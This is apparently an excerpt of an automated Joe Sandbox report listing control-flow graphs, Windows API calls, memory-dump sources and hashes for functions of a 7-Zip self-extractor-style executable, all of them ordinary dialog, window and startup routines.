                                                                                                                                              control_flow_graph 1013 14000a118-14000a16e GetDlgItem GetWindowLongPtrW 1014 14000a1a8 1013->1014 1015 14000a170-14000a1a6 GetDlgItem call 1400021cc 1013->1015 1017 14000a1b0-14000a1d3 GetDlgItem GetWindowLongPtrW 1014->1017 1015->1017 1019 14000a1d5-14000a206 GetDlgItem call 1400021cc 1017->1019 1020 14000a20d-14000a20f 1017->1020 1019->1020 1022 14000a211-14000a214 1020->1022 1023 14000a223-14000a225 1020->1023 1022->1023 1025 14000a216-14000a219 1022->1025 1026 14000a227-14000a229 1023->1026 1027 14000a240-14000a248 1023->1027 1032 14000a21b-14000a21e 1025->1032 1033 14000a220 1025->1033 1028 14000a237-14000a23c 1026->1028 1029 14000a22b-14000a22e 1026->1029 1030 14000a24a 1027->1030 1031 14000a24e-14000a2b1 GetSystemMetrics * 4 GetParent 1027->1031 1028->1027 1029->1028 1034 14000a230-14000a235 1029->1034 1030->1031 1035 14000a322-14000a353 SetWindowPos 1031->1035 1036 14000a2b3-14000a2f2 GetClientRect ClientToScreen * 2 1031->1036 1032->1023 1033->1023 1034->1027 1039 14000a3e2-14000a3fc 1035->1039 1040 14000a359-14000a3ad call 14000a0b8 GetDlgItem call 1400021cc 1035->1040 1037 14000a302-14000a30d 1036->1037 1038 14000a2f4-14000a2ff 1036->1038 1042 14000a31b-14000a31f 1037->1042 1043 14000a30f-14000a319 1037->1043 1038->1037 1041 14000a400-14000a408 call 14000a0b8 1039->1041 1052 14000a3bb 1040->1052 1053 14000a3af-14000a3b9 1040->1053 1047 14000a40d-14000a416 1041->1047 1042->1035 1043->1042 1050 14000a4da-14000a513 GetSystemMetrics * 2 1047->1050 1051 14000a41c-14000a42d GetClientRect 1047->1051 1054 14000a4a5-14000a4cf 1051->1054 1055 14000a42f-14000a432 1051->1055 1057 14000a3be-14000a3e0 1052->1057 1053->1057 1056 14000a4d2-14000a4d5 call 14000a0b8 1054->1056 1055->1054 1058 14000a434-14000a4a3 call 14000a0b8 GetDlgItem call 1400021cc 1055->1058 1056->1050 1057->1041 1058->1056
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Item$ClientMetricsSystem$Window$Screen$Rect$LongParent
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3236151763-0
                                                                                                                                              • Opcode ID: 4e6f5c853753a3134c549e3a9eaf14236156baa682c8ed6c7a59dc888e120e6d
                                                                                                                                              • Instruction ID: 8348584d0956bbbffa7648db67e91854ff55739536c96388f37e5c2a24ed157b
                                                                                                                                              • Opcode Fuzzy Hash: 4e6f5c853753a3134c549e3a9eaf14236156baa682c8ed6c7a59dc888e120e6d
                                                                                                                                              • Instruction Fuzzy Hash: CEC19CB66142418BD724DF6AF44479EBBA1F7CD784F104129EF8A83B68DB7DE8458B00

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1064 14001f68c-14001f6bd GetStartupInfoW 1065 14001f6bf-14001f6ca 1064->1065 1066 14001f6e5-14001f6ee 1065->1066 1067 14001f6cc-14001f6cf 1065->1067 1070 14001f6fa-14001f702 1066->1070 1071 14001f6f0-14001f6f8 _amsg_exit 1066->1071 1068 14001f6d1-14001f6d6 1067->1068 1069 14001f6d8-14001f6e3 Sleep 1067->1069 1068->1066 1069->1065 1073 14001f704-14001f721 1070->1073 1074 14001f755 1070->1074 1072 14001f75f-14001f768 1071->1072 1075 14001f787-14001f789 1072->1075 1076 14001f76a-14001f77d _initterm 1072->1076 1077 14001f725-14001f728 1073->1077 1074->1072 1080 14001f794-14001f79c 1075->1080 1081 14001f78b-14001f78d 1075->1081 1076->1075 1078 14001f747-14001f749 1077->1078 1079 14001f72a-14001f72c 1077->1079 1078->1072 1083 14001f74b-14001f750 1078->1083 1079->1078 1082 14001f72e-14001f734 1079->1082 1084 14001f79e-14001f7ac call 14001fa98 1080->1084 1085 14001f7bd-14001f7cc 1080->1085 1081->1080 1086 14001f736-14001f738 1082->1086 1087 14001f73c-14001f745 1082->1087 1089 14001f8a9-14001f8be 1083->1089 1084->1085 1094 14001f7ae-14001f7b5 1084->1094 1088 14001f7d0-14001f7d3 1085->1088 1086->1087 1087->1077 1092 14001f7d5-14001f7d8 1088->1092 1093 14001f848-14001f84b 1088->1093 1098 14001f7da-14001f7dc 1092->1098 1099 14001f7de-14001f7e1 1092->1099 1095 14001f85a-14001f865 _ismbblead 1093->1095 1096 14001f84d-14001f856 1093->1096 1094->1085 1100 14001f867-14001f86a 1095->1100 1101 14001f86f-14001f877 1095->1101 1096->1095 1098->1093 1098->1099 1102 14001f7f2-14001f815 call 1400099fc 1099->1102 1103 14001f7e3-14001f7e6 1099->1103 1100->1101 1101->1088 1101->1089 1106 14001f81a-14001f827 1102->1106 1103->1102 1104 14001f7e8-14001f7f0 1103->1104 1104->1099 1107 14001f831-14001f838 1106->1107 1108 14001f829-14001f82b exit 1106->1108 1109 14001f846 1107->1109 1110 14001f83a-14001f840 _cexit 1107->1110 1108->1107 1109->1089 1110->1109
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoSleepStartup_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                                              • String ID: MZ`
                                                                                                                                              • API String ID: 4226152999-2330268423
                                                                                                                                              • Opcode ID: 64dae940a6cafae03685ce600b355dccff89d17899c6c895487bbbc6450da032
                                                                                                                                              • Instruction ID: c66a68b562d0c52db21e98d4b175da4e710ecd27ba04559c35a55d4fd9d277bd
                                                                                                                                              • Opcode Fuzzy Hash: 64dae940a6cafae03685ce600b355dccff89d17899c6c895487bbbc6450da032
                                                                                                                                              • Instruction Fuzzy Hash: E25137326087418AF7638B22E9847E976A4F79C7D4F544029FB4A8B6F5DB3EC894D700

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$??3@ErrorLast$EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                                                                              • String ID: 7zSfxFolder%02d
                                                                                                                                              • API String ID: 3593046394-2820892521
                                                                                                                                              • Opcode ID: 346e1575df3d3e1ec67df042477625ee05366d7f474db4da1a58911701c8eb0c
                                                                                                                                              • Instruction ID: d86841789fdcc1852a20617a9d7e1424b9201dffb0f1e542e4f0a725028d934a
                                                                                                                                              • Opcode Fuzzy Hash: 346e1575df3d3e1ec67df042477625ee05366d7f474db4da1a58911701c8eb0c
                                                                                                                                              • Instruction Fuzzy Hash: 4C513BB2615A4082FB12EB22F8557D96366F78C7D5F904529FB4D07ABADF38C904CB40

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageTimerWindow$CreateDestroyDispatchHandleKillModule
                                                                                                                                              • String ID: Static
                                                                                                                                              • API String ID: 1156981321-2272013587
                                                                                                                                              • Opcode ID: 4def929598b39bd733724bb09f5a6ff4e7b17700c7379cf9330da86517aae6d6
                                                                                                                                              • Instruction ID: 4b9457724f161a57c401fd14340ddc3d744f683f53298b62602d5d74445e60c2
                                                                                                                                              • Opcode Fuzzy Hash: 4def929598b39bd733724bb09f5a6ff4e7b17700c7379cf9330da86517aae6d6
                                                                                                                                              • Instruction Fuzzy Hash: 7F115E71614B8083E711CBB5F8557EA77A0F7DC784F400229AB4A87AA4DF3CC4488B00

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1188 140009fc0-140009ffa GetDC 1189 14000a097-14000a0b5 1188->1189 1190 14000a000-14000a06f GetSystemMetrics * 3 SelectObject DrawTextW 1188->1190 1191 14000a071 1190->1191 1192 14000a075-14000a078 1190->1192 1191->1192 1193 14000a07a 1192->1193 1194 14000a07d-14000a091 SelectObject ReleaseDC 1192->1194 1193->1194 1194->1189
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2466489532-0
                                                                                                                                              • Opcode ID: 4206e7a3e9d1913623ca566ab4f36691769513c5b6083dee215e1b73967a417d
                                                                                                                                              • Instruction ID: 40fb2d017464c156155d3dfe065c4dc365d96e56848652a51c7dfb2d0fc5abc1
                                                                                                                                              • Opcode Fuzzy Hash: 4206e7a3e9d1913623ca566ab4f36691769513c5b6083dee215e1b73967a417d
                                                                                                                                              • Instruction Fuzzy Hash: 3D216D76604A949BD705DF63E84478AB760F798BD8F408518EF5A43B64CF38E4A6CB00

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2693764856-0
                                                                                                                                              • Opcode ID: 26fabf489a1ef6bcd509b6eb77f1ff65f28faa688a1408529bff874025cbf77a
                                                                                                                                              • Instruction ID: b9517a37f92d20582659d71d18bd2e741eaf10e01a778314a6a8e95dcbfff312
                                                                                                                                              • Opcode Fuzzy Hash: 26fabf489a1ef6bcd509b6eb77f1ff65f28faa688a1408529bff874025cbf77a
                                                                                                                                              • Instruction Fuzzy Hash: FB31827520578186E766DB62F4147DAB3A0F79CBD0F444129EB8A43B64DF7CC545CB00

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$lstrlenmemcmp$??2@memcpy
                                                                                                                                              • String ID: amd64$x64
                                                                                                                                              • API String ID: 2116704905-3265184354
                                                                                                                                              • Opcode ID: dc7cb85b40b12feb772f5ea38b5e3ccb6ebf715c13dcc451150c46cbe1c7a466
                                                                                                                                              • Instruction ID: e1e9cdc367da93d0c860c32fb7537c4a99d3299c5fbbe69dbd3d8d10b43e4673
                                                                                                                                              • Opcode Fuzzy Hash: dc7cb85b40b12feb772f5ea38b5e3ccb6ebf715c13dcc451150c46cbe1c7a466
                                                                                                                                              • Instruction Fuzzy Hash: 7E614976218A8596DB12EF22E4403DAB3B5F78D7C8F945026FB8917769CF39C906CB40

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1252 140001000-14000101d 1253 140001023-14000102f 1252->1253 1254 1400010cc-1400010e0 1252->1254 1255 140001031-140001038 1253->1255 1256 14000104f-140001074 call 1400027a0 wsprintfW 1253->1256 1257 140001043-14000104d call 1400027a0 1255->1257 1258 14000103a-14000103c 1255->1258 1262 140001076 1256->1262 1263 1400010ae 1256->1263 1267 1400010b6-1400010c5 call 14000c698 call 140005cc4 ExitProcess 1257->1267 1258->1257 1266 14000107a-1400010ac wsprintfW lstrcatW 1262->1266 1263->1267 1266->1263 1266->1266
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wsprintf$ExitProcesslstrcat
                                                                                                                                              • String ID: 0x%p
                                                                                                                                              • API String ID: 2530384128-1745605757
                                                                                                                                              • Opcode ID: 19cd34f0a533aafb2d197500bf6eb3d135093424969f0e8b536446425ef47901
                                                                                                                                              • Instruction ID: acc37192b4180f8edc1e7423af0c814a1dc50cd8e32be561646255b37a72992f
                                                                                                                                              • Opcode Fuzzy Hash: 19cd34f0a533aafb2d197500bf6eb3d135093424969f0e8b536446425ef47901
                                                                                                                                              • Instruction Fuzzy Hash: 85214776604A8296EA22DF62F8907C923A1F7DC7C0F80412AEB8D436A5DF78C995C740

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1276 1400034b0-14000351f call 14001fc50 call 140015290 lstrlenA * 2 1280 140003523-140003544 call 140015230 1276->1280 1282 140003617 1280->1282 1283 14000354a-140003553 1280->1283 1284 140003619-14000362c 1282->1284 1283->1282 1285 140003559-14000355d 1283->1285 1286 140003562-140003567 1285->1286 1287 140003569-140003572 1286->1287 1288 1400035aa-1400035af 1286->1288 1289 140003574-14000358d memcmp 1287->1289 1290 1400035d7-1400035fa memcpy 1287->1290 1288->1290 1291 1400035b1-1400035ca memcmp 1288->1291 1292 140003609-14000360b 1289->1292 1293 14000358f-140003591 1289->1293 1296 1400035fc-140003604 1290->1296 1297 14000360d-140003615 1290->1297 1294 1400035a1-1400035a8 1291->1294 1295 1400035cc-1400035d5 1291->1295 1292->1284 1293->1282 1298 140003597-14000359c call 140002e44 1293->1298 1294->1286 1295->1286 1296->1280 1297->1284 1298->1294
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlenmemcmp$memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4028117624-0
                                                                                                                                              • Opcode ID: 881938441dd166818063c08505795d51be164eb9d713f433d9f99ef1e321ac14
                                                                                                                                              • Instruction ID: bb44bf155945f8d6f34932f9ce24bbc9304702f5a66cef83cbbbee2e70d880ab
                                                                                                                                              • Opcode Fuzzy Hash: 881938441dd166818063c08505795d51be164eb9d713f433d9f99ef1e321ac14
                                                                                                                                              • Instruction Fuzzy Hash: 7841C5B371458092D722DF5BF8447DEA695B39CBC4F588026FF8983B64EA79C989C700

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1302 140009e30-140009e72 SystemParametersInfoW 1303 140009e74-140009e89 1302->1303 1304 140009ee7-140009f05 1302->1304 1305 140009e96-140009ea7 CreateFontIndirectW 1303->1305 1306 140009e8b-140009e94 GetSystemMetrics 1303->1306 1307 140009ea9-140009ec3 call 140009fc0 1305->1307 1308 140009edd-140009ee4 1305->1308 1306->1305 1309 140009ec7-140009ec9 1307->1309 1308->1304 1310 140009ed4-140009ed7 DeleteObject 1309->1310 1311 140009ecb-140009ecf 1309->1311 1310->1308 1311->1310
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1900162674-0
                                                                                                                                              • Opcode ID: 97b607c756a1c54a1dd479288cac96d42e9ce5d4143aa50fdb25c6ee00870b4f
                                                                                                                                              • Instruction ID: e267296afe67887ce3ec2b2f2b6ae7c4e753fcb0ca15295eefdac00a7c053f0d
                                                                                                                                              • Opcode Fuzzy Hash: 97b607c756a1c54a1dd479288cac96d42e9ce5d4143aa50fdb25c6ee00870b4f
                                                                                                                                              • Instruction Fuzzy Hash: 43215872204A819BD311CF42F888BDAB361F798BC4F554126FF5A43BA8DB38D985CB00

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@TextWindow$Length
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2308334395-0
                                                                                                                                              • Opcode ID: 5bb13551ee4accaa661b1caaa54c1d28fd1ca95166b1327092facfeaeeeb78d9
                                                                                                                                              • Instruction ID: 6ba6d3db72f77dec7bb65fc3950b8e1d26046cadfe83edb426c1c540d51eaf2d
                                                                                                                                              • Opcode Fuzzy Hash: 5bb13551ee4accaa661b1caaa54c1d28fd1ca95166b1327092facfeaeeeb78d9
                                                                                                                                              • Instruction Fuzzy Hash: 8301EC7222494992DE12EB52F4513EAA321FBD97C4F905122F78D4767ADE3CCA09CB00
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsSystem$Item
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 56695849-0
                                                                                                                                              • Opcode ID: a040629c6100af4c50eae1f3d672cc5fca0d75be94414af8d4edd9412cc7a44c
                                                                                                                                              • Instruction ID: 4a3ee8f57d2fba9540499de171231a1ee7a3cb3d0247ab43bed433d0316f880c
                                                                                                                                              • Opcode Fuzzy Hash: a040629c6100af4c50eae1f3d672cc5fca0d75be94414af8d4edd9412cc7a44c
                                                                                                                                              • Instruction Fuzzy Hash: F4217173500655CBDB50CF66E40029EB7B0F788F99F158116EB8913728DB78E946CF80
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2178440468-0
                                                                                                                                              • Opcode ID: 7db93ef1b9720d41535e79d9563aba36c55eede9a9ab1c2f874995bd30859416
                                                                                                                                              • Instruction ID: c9c9ddbc639c1b51baff4819c68466cc280cea20fdf69b61889efa159f58aed6
                                                                                                                                              • Opcode Fuzzy Hash: 7db93ef1b9720d41535e79d9563aba36c55eede9a9ab1c2f874995bd30859416
                                                                                                                                              • Instruction Fuzzy Hash: 7E015736610B948AE7548F53A880B9D77A1E79DFC0F588429EF4A03B64CB38E991C740
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsSystem$??3@ReadWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 337618803-0
                                                                                                                                              • Opcode ID: 497850246290ed38c37119841aed6482982bf5f918e31e0164e8fde76b4d8e76
                                                                                                                                              • Instruction ID: 80329869c1f7ac6ded373c5337ce0c0f455f784db5b649e745c2e1829cc0d4df
                                                                                                                                              • Opcode Fuzzy Hash: 497850246290ed38c37119841aed6482982bf5f918e31e0164e8fde76b4d8e76
                                                                                                                                              • Instruction Fuzzy Hash: 1E1135B0625A8581EB52DB62F881BE523A0ABDD7C4F904419FB8D472B1DF3CC9898750
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$ParentRect
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286822721-0
